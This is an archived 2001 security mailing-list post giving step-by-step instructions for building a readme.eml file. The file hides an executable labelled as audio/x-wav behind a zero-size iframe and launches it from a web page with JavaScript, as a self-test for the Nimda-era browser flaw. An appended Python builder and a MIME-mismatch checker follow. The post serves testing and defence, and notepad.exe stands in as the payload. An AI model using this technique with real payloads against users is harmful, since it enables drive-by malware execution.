test for browser vulnerability

From: oncemyway (oncemyway@computers-mn.com)
Date: 09/18/01


From: "oncemyway" <oncemyway@computers-mn.com>
To: <incidents@securityfocus.com>, <bugtraq@securityfocus.com>
Subject: test for browser vulnerability
Date: Tue, 18 Sep 2001 15:17:38 -0500
Message-ID: <000101c1407e$f6cd6f40$be2b87a8@I23T78R1>

Hello-

I became concerned with this after I read someone had actually executed the
code by visiting a web site. (my servers are patched, so I'm not worried
about that)

I have duplicated the readme.eml message, only using notepad.exe instead.

If I use an actual .wav file, readme.eml is opened from the web page and the
wav file opens and plays in media player. If I use notepad.exe
(Content-Type: audio/x-wav), I am prompted as to whether I would like to
download or not. If I select run from current location, it runs notepad.
This is the behavior I would like, so no malicious code runs without me
knowing. However, I am using Media Player 6.4, so I don't know if it makes a
difference.

To create your own readme.eml to test if you are susceptible, follow these
steps:

1. Create a dummy message in OE. You don't have to address it to anyone.
2. Attach notepad.exe.
3. Save as readme.eml
4. Edit the readme.eml with notepad. Find the html body and replace with:

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>

5. Find the notepad.exe attachment section. Change Content-Type to
audio/x-wav
6. (necessary?) Remove Content-Disposition:
attachment;filename="NOTEPAD.EXE" header.
7. Add the following header:

Content-ID: <EA4DMGBP9p>

This is apparently to link the iframe <src> tag.

8. Save the file.
9. Create a web page that includes the code:

<script language="JavaScript">
window.open("readme.eml", null, "resizable=yes,top=0,left=0")
</script>

make sure readme.eml is in the same directory.
10. Open the web page and see what happens. Like I said, I was prompted. I
hope you are too because this would be very serious if it could be spread
*that* easy.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
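The ten steps above, as an added example (not code from the original post): a Python script that builds a readme.eml of the shape the poster describes (multipart/related, a hidden iframe whose src is a cid: reference, and an attachment declared as audio/x-wav with a Content-ID and no Content-Disposition header) and a checker that parses an .eml and flags parts whose leading bytes contradict their declared Content-Type. The builder uses a constructed MZ-header stand-in rather than notepad.exe, the placeholder addresses, function names and sniffing rules are my own assumptions, and the Content-ID EA4DMGBP9p is the one used in the post.

```python
# Added example (not code from the original post): builds a readme.eml of the
# shape described in the steps above and checks an .eml for the MIME-type lie
# it relies on. Names, placeholder addresses and sniffing rules are assumptions.
import email
import email.policy
import re
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

CID = "EA4DMGBP9p"  # the Content-ID used in the post

IFRAME_CID_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?cid:([^\s"\'>]+)', re.IGNORECASE)


def build_test_eml(payload: bytes, declared_type: str = "audio/x-wav", cid: str = CID) -> bytes:
    """Build an .eml with a hidden iframe that references a cid: part.

    The part carries `payload` under `declared_type` with a Content-ID and,
    as in step 6 of the post, no Content-Disposition header.
    """
    msg = MIMEMultipart("related")
    msg["From"] = "test@example.invalid"  # placeholder addresses (assumption)
    msg["To"] = "test@example.invalid"
    msg["Subject"] = "test for browser vulnerability"
    html = (
        "<HTML><HEAD></HEAD><BODY bgColor=#ffffff>\n"
        f"<iframe src=cid:{cid} height=0 width=0>\n"
        "</iframe></BODY></HTML>\n"
    )
    msg.attach(MIMEText(html, "html"))
    maintype, subtype = declared_type.split("/", 1)
    part = MIMEBase(maintype, subtype)
    part.set_payload(payload)
    encoders.encode_base64(part)  # sets Content-Transfer-Encoding: base64
    part["Content-ID"] = f"<{cid}>"
    msg.attach(part)
    return msg.as_bytes()


def sniff_type(data: bytes) -> str:
    """Guess a MIME type from leading bytes (only the two formats that matter here)."""
    if data[:2] == b"MZ":
        return "application/x-msdownload"  # DOS/PE executable header
    if data[:4] == b"RIFF" and data[8:12] == b"WAVE":
        return "audio/x-wav"
    return "unknown"


def find_mismatched_parts(eml: bytes) -> list:
    """Return parts whose bytes contradict their declared Content-Type.

    Each finding records the Content-ID, declared vs. sniffed type, whether
    a Content-Disposition header is present, and whether some text/html part
    references the part from an iframe via cid:.
    """
    msg = email.message_from_bytes(eml, policy=email.policy.default)
    iframe_cids = set()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            iframe_cids.update(IFRAME_CID_RE.findall(part.get_content()))
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        data = part.get_payload(decode=True) or b""
        declared = part.get_content_type()
        actual = sniff_type(data)
        if actual == "unknown" or actual == declared:
            continue
        cid = str(part.get("Content-ID", "")).strip("<>")
        findings.append({
            "cid": cid,
            "declared": declared,
            "actual": actual,
            "has_disposition": part.get("Content-Disposition") is not None,
            "in_iframe": cid in iframe_cids,
        })
    return findings


if __name__ == "__main__":
    # Constructed stand-in for notepad.exe: an MZ header plus padding, not a real program.
    fake_exe = b"MZ" + b"\x90\x00" * 30
    eml = build_test_eml(fake_exe)
    with open("readme.eml", "wb") as fh:
        fh.write(eml)
    for finding in find_mismatched_parts(eml):
        print(finding)
```

The checker is a heuristic on leading bytes; whether a client actually hands the part to the wav handler or prompts, as the poster observed, depends on that client's handling of the declared type, which is exactly what the test file is meant to reveal. Swap the payload for a RIFF/WAVE byte string and the checker reports nothing, since declared and sniffed types then agree.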
